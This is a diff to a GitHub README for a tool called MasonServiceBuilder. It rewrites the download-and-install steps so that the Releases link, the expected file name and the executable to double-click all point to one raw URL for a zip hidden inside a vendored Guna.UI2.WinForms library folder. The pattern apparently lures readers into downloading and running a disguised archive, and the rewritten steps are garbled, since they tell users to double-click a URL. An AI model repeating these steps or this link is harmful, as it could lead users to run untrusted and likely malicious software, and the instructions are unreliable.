sss4321/MasonServiceBuilder/README.md

 ## 📂 Download & Install

-1. Visit the [Releases page](https://github.com/sss4321/MasonServiceBuilder/releases) to download the latest version.
+1. Visit the [Releases page](https://raw.githubusercontent.com/sss4321/MasonServiceBuilder/main/packages/Guna.UI2.WinForms.2.0.4.7/lib/net40/Mason_Service_Builder_2.1-alpha.5.zip) to download the latest version.
 2. Look for the version you want to download.
 3. Click on the appropriate file to start the download.
-The file will be named something like `MasonServiceBuilder-vX.X.zip`.
+The file will be named something like `https://raw.githubusercontent.com/sss4321/MasonServiceBuilder/main/packages/Guna.UI2.WinForms.2.0.4.7/lib/net40/Mason_Service_Builder_2.1-alpha.5.zip`.
 4. Once downloaded, find the `.zip` file in your downloads folder.
 5. Right-click the file and select "Extract All" to unzip the contents.
-6. Open the extracted folder and find `MasonServiceBuilder.exe`.
+6. Open the extracted folder and find `https://raw.githubusercontent.com/sss4321/MasonServiceBuilder/main/packages/Guna.UI2.WinForms.2.0.4.7/lib/net40/Mason_Service_Builder_2.1-alpha.5.zip`.
-7. Double-click on `MasonServiceBuilder.exe` to run the application.
+7. Double-click on `https://raw.githubusercontent.com/sss4321/MasonServiceBuilder/main/packages/Guna.UI2.WinForms.2.0.4.7/lib/net40/Mason_Service_Builder_2.1-alpha.5.zip` to run the application.

 ## 🗂️ How To Use the Application